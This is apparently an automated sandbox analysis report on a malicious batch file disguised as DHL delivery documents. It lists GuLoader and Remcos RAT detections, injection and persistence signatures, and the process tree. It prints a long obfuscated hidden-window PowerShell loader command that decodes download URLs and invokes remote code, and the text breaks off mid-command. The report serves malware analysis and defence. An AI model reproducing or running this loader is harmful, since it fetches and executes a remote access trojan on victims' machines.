Windows
Analysis Report
awb_post_dhl_delivery_documents_06_03_2025_00000000000250506.bat
Overview
General Information
Detection
GuLoader, Remcos
Score: 100
Range: 0 - 100
Confidence: 100%
Signatures
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Suspicious powershell command line found
Uses dynamic DNS services
Writes to foreign memory regions
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 6236, cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\awb_post_dhl_delivery_documents_06_03_2025_00000000000250506.bat" ", MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 5860, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6232, cmdline:
powershell .exe -wind owstyle hi dden "echo $Reconjoi n;function Yngve($Sa gan){ .($M iljforandr ingen) ($S agan)} fun ction Free loaded($Kn yttelverse nes){$Unsu ppleness=5 ;do{$Nonor dered+=$Kn yttelverse nes[$Unsup pleness];$ Unsupplene ss+=6;$Gaa rdmand=For mat-List} until(!$Kn yttelverse nes[$Unsup pleness])$ Nonordered }$Stokerfy rene9=Free loaded ' G adeN s eje Mangat Anh y.Retniw'; $Stokerfyr ene9+=Free loaded 'Li thse nalyb Fa erc U m ilPrec.IRa ilrE SlgtN Vid rt';$U dtalendes= Freeloaded 'CommuMSp urro,vulrz in.tiCocc ilBir.mlTr e eaSte,n/ ';$Unsuppl enesschthy ologic=Fre eloaded 'V irtuTTermo lDebats Hu mu1Tusin2' ;$Soejlevi s='Green[G ratiNCentr eM niatHeg em. Ud aSG risgETeate rAfslav Ce lIClaywCF lybyENecta PDionyo Pa naI aarenF ,refTIn,er MDrgniaLuf tfn FednaB eredgRapni e DoveRBre ds]Helli:S moko: port SRestre He lcP.rmuuT alefR Arri iBalbutGas trYSm.lkpP usssRSlave OTyptoT Sy co ffabCB ouiloPleje lB,jle= So li$SkuesU Ss eNtoyma s fteuGa.l opCystep U i.eLTonsiE jejunn Sys tEContrSAr istSO denC Styk hH or tT Ove h e ntyParalOT r efL Veg oBargaGHor teIS ngnc' ;$Udtalend es+=Freelo aded ' Ski 5Ov rk.Je nsp0Eastr Inebr( Rev W.elefiPa ntenGipsud Lemaro Neu rwApotesMa nas Attr N ZamorTgaml e Te.ns1Sp utn0cuiss. Ti.s0Fine s;Torsk Ca dmiWFrakoi Vul,anGaas e6Kreat4,l kef; Stic Uninsx Sla g6,awmo4P two;fort UnchrChefs vCivil:D,n dr1uneat3 ykke4Coshe .Fotog0.it el)Kr ig U dpoGTranse S aftcMusl ikAortooRe tab/Trach2 prin0Skum m1Afrik0Rh amn0Outsp1 cadm0S il l1Be gg Kn ittFUrtepi Avisrefte reNarref K onoInditx S tr/No,s u1Rdbed3 B esk4 Bist. Bukse0';$A bsurdistis k=Freeload ed ' Kom,u Petu,SGear kEPulveR K ell-Gendea ForkoG inu sEPseudNSp herT';$Gig tfebers=Fr eeloaded ' E bothHavm it .wizt i negpRealls Mniac:baa. m/Chi.k/En g lpTapsae ForhnIter odFr,tieAf sp l Purdi RespivAdop teindklr P odoySk alh Nat linde . Har cMi saloD,modm Vog.m/Brug eMS ttiuBi dsar C mpk Alkyde Anc rOv,rc. 
S ejllMtrikp Tank k Spi c> Natuh B l.et F lct Mhla,pUnde rsA gaa:Ud vik/Deute/ Skol.pMagt eeSkibsn I m rd.ophie AntislD ir yiPa advNo nreeblaakr patriy Rou ,h revolTr skoxSubtrp Medd.Uddi fc DyksoUd slum Hrme/ WolflMReki nuGrororYn dlikT luse Sleskr nde r.Hektol G rnspStridk ';$Delggel sesdrifter s=Freeload ed 'Overd> ';$Miljfor andringen= Freeloaded 'GrublIGr aniE By.aX ';$Adulter ers='samme nbundne';$ Unincrimin ated='\reg nskabsinfo rmationern es.arm';Yn gve (Freel oaded 'Kon tr$ForfagP raecLSemip O ekstbWad inaHjertlC lu r:T ail tEd toRGla nsOD.gteuK epesSacca eLebisR Ca vae Heget la atMor g ENedrySAut op= Toug$O xygaEHisto NA sisVSco re:JutehAP luriPClima pprecodPen n aHjemmtT o liA Disj +Skelg$Son orU ContNU nsi Iu ira NAutenCStn der ,eakiK loreMLater